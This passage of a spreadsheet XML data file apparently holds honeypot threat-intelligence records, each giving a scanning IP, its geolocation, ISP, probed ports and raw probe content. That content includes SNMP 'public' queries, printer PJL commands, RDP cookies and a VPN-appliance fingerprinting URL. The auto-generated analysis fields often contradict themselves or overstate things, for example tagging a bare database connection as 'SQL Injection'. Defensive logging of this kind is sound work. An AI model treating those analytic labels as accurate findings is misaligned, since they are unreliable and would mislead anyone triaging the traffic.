    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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d1:a22"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="322"/>
    <x v="322"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:32:55"/>
    <d v="2025-03-11T21:24:13"/>
    <d v="2025-04-29T22:32:55"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:be85"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="323"/>
    <x v="323"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:24:45"/>
    <d v="2024-04-11T13:07:00"/>
    <d v="2025-04-29T22:24:45"/>
    <n v="117"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_IRC_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;1080&amp;&amp;1521&amp;&amp;1433&amp;&amp;3306&amp;&amp;161&amp;&amp;23&amp;&amp;110&amp;&amp;3389&amp;&amp;10675&amp;&amp;5432&amp;&amp;9100&amp;&amp;6667&amp;&amp;143&amp;&amp;50992&amp;&amp;389&amp;&amp;52406&amp;&amp;5900&amp;&amp;51142&amp;&amp;445&amp;&amp;21"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;query&amp;&amp;stshash&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.134,63010)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.134,63020)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.134,63028)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NdQeWLmmw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LIXIQc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hfpvKD'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TEqiMoeuI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ihAWmQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SNnkpf'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f86"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No notable malicious activity detected as SOCKS5 information is missing. _x000a_This indicates that no suspicious SOCKS5 connections were logged. _x000a_Missing SOCKS5 details make this log entry inconclusive for analysis. &amp;&amp; This indicates a potential attempt to establish a SOCKS5 connection, which could be used for proxying malicious traffic or evading detection. The &quot;Data&quot; field being NA suggests that no data was sent during this attempt. This behavior is often seen in reconnaissance or scanning activities. &amp;&amp; Possible malicious activity is an attempt to print information about the printer settings using a special printer control command. This could be part of a larger attack or used for reconnaissance. It's likely an unauthorized probe. &amp;&amp; A potential printer exploitation attempt, where an attacker is sending a malicious command to gain unauthorized access or control over a device. This could be part of a larger attack to install malware or gather sensitive information. The attacker may be targeting the printer's built-in functionality."/>
    <s v="Proxy Scan &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="324"/>
    <x v="324"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:22:10"/>
    <d v="2023-07-30T04:55:11"/>
    <d v="2025-04-29T22:22:10"/>
    <n v="876"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_POP3_H3&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_SNMP_H18&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_MSSQL_H47&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_IRC_H13&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_RDP_H28&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;22&amp;&amp;23&amp;&amp;161&amp;&amp;143&amp;&amp;110&amp;&amp;18486&amp;&amp;NA&amp;&amp;9100&amp;&amp;5432&amp;&amp;6667&amp;&amp;389&amp;&amp;1521&amp;&amp;443&amp;&amp;1433&amp;&amp;6379&amp;&amp;1080&amp;&amp;57241&amp;&amp;54500&amp;&amp;3389&amp;&amp;57308&amp;&amp;8443&amp;&amp;3306&amp;&amp;445&amp;&amp;80&amp;&amp;52120&amp;&amp;5900&amp;&amp;49737&amp;&amp;51427&amp;&amp;50370&amp;&amp;51869&amp;&amp;55464&amp;&amp;54561&amp;&amp;61542"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;query&amp;&amp;GET&amp;&amp;command&amp;&amp;request&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,64954)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,64968)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,64972)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OFaEFOjeO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KvVnBz'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jwIVWS'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65370)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65374)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65388)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eUWQmKLPc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gCSvQr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bYSvel'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qMxFPS'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60786)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60796)}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jeXghRvIz'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eeWMGO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ccEurx'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60054)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60060)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60076)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yQRRKx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RTtViNlWc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NiKALL'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65464)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65476)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65482)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1ff7"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Here's the analysis of possible malicious activity: &amp;&amp; No FTP activity detected, suggesting that an attacker tried to exploit this service but was unsuccessful or did not attempt it at all. _x000a_This indicates either no malicious traffic for the FTP service or the system is not configured to capture FTP logs._x000a_The absence of FTP activity does not necessarily indicate normal behavior as the system's FTP capabilities may be disabled. &amp;&amp; Unknown FTP connection attempt, possibly an unauthorized access attempt. No further information is available as the FTP logs are incomplete or unavailable. The lack of data suggests that no action was taken. &amp;&amp; No log data provided, cannot analyze any activity. &amp;&amp; No malicious activity detected as SOCKS5 protocol is blocked for now but still logged. This indicates that an attempt was made to connect via SOCKS5, possibly indicating unauthorized access. Further investigation may be required. &amp;&amp; This log suggests that there was an attempt to use SOCKS5 protocol but it is unclear if this was successful or attempted maliciously as the outcome is marked as Not Available (NA). A user may have tried using a proxy service. The request was likely not fulfilled due to blocked connection. &amp;&amp; The data suggests an attempt to establish a connection using Socks5 protocol, which can be used for anonymous browsing or proxying malicious traffic. This could indicate an attacker trying to hide their IP address. The lack of activity on this service does not rule out potential future attempts. &amp;&amp; Possible unauthorized access to device management system, using default community string &quot;public&quot;. This could indicate a scanning or reconnaissance attempt by an attacker. Attempt to retrieve system information. &amp;&amp; Possible FTP login attempt using TLS encryption, attempting authentication. Unknown user trying to authenticate via FTP. Malicious actor may be attempting to exploit vulnerable FTP server. &amp;&amp; The malicious activity indicates an attempt to establish a secure connection using TLS for authentication purposes, which could be part of a larger attack or unauthorized access attempt. This suggests an attacker may be trying to bypass security measures or gain unauthorized access. The use of TLS in this context implies a potential exploitation attempt."/>
    <s v="The attackers are attempting to scan and exploit various services on a network, including FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SIP, SMB, SMTP, SNMP, and others. They are using automated tools to gather information about the services, identify potential vulnerabilities, and attempt to gain unauthorized access. Some attackers are also attempting to bypass authentication mechanisms. &amp;&amp; Port Scanner &amp;&amp; Scanning Attempt &amp;&amp; Port Scanning &amp;&amp; Brute Force &amp;&amp; FTPS Attack &amp;&amp; SSL Brute"/>
  </r>
  <r>
    <x v="325"/>
    <x v="325"/>
    <s v="NA&amp;&amp;prod-boron-us-central-129.li.binaryedge.ninja"/>
    <x v="0"/>
    <d v="2025-04-29T22:12:07"/>
    <d v="2025-04-04T15:01:30"/>
    <d v="2025-04-29T22:12:07"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_IMAP_HC1"/>
    <s v="NA&amp;&amp;143&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="El Paso"/>
    <s v="Socorro"/>
    <s v="5530932"/>
    <s v="NA"/>
    <s v="31.6546"/>
    <s v="-106.303"/>
    <s v="63949"/>
    <s v="Akamai Technologies, Inc."/>
    <s v="Akamai Technologies, Inc."/>
    <s v="hosting"/>
    <s v="Linode"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/dana-na/nc/nc_gina_ver.txt'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d21:787c"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="A GET request is made to a specific URI, possibly attempting to download or gather sensitive information. The user agent appears to be legitimate, but the host IP suggests an external actor. This activity may indicate reconnaissance or data exfiltration attempts."/>
    <m/>
  </r>
  <r>
    <x v="326"/>
    <x v="326"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:11:53"/>
    <d v="2023-12-03T09:14:00"/>
    <d v="2025-04-29T22:11:53"/>
    <n v="274"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;42539&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a0:b97b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown activity detected for MSSQL service, possibly a connection attempt or probing of database vulnerability. No further information is available as it's marked as &quot;not available&quot;. This could indicate an attempted attack on the database system."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="327"/>
    <x v="327"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:11:32"/>
    <d v="2023-12-03T12:29:00"/>
    <d v="2025-04-29T22:11:32"/>
    <n v="283"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H30"/>
    <s v="23&amp;&amp;32426&amp;&amp;54066&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="48"/>
    <s v="Gyeongsangnam-do"/>
    <s v="Gimhae-si"/>
    <s v="Gimhae (Mugye-dong)"/>
    <s v="1842943"/>
    <s v="NA"/>
    <s v="35.2001"/>
    <s v="128.815"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc5f:4028"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No data provided."/>
    <m/>
  </r>
  <r>
    <x v="328"/>
    <x v="328"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:11:28"/>
    <d v="2025-04-17T06:46:04"/>
    <d v="2025-04-29T22:11:28"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1&amp;&amp;abuseipdb"/>
    <s v="8443&amp;&amp;NA&amp;&amp;443&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AE"/>
    <s v="United Arab Emirates"/>
    <s v="DU"/>
    <s v="Dubai"/>
    <s v="West"/>
    <s v="Dubai (Al Barsha First)"/>
    <s v="292223"/>
    <s v="18573 79559"/>
    <s v="25.1212"/>
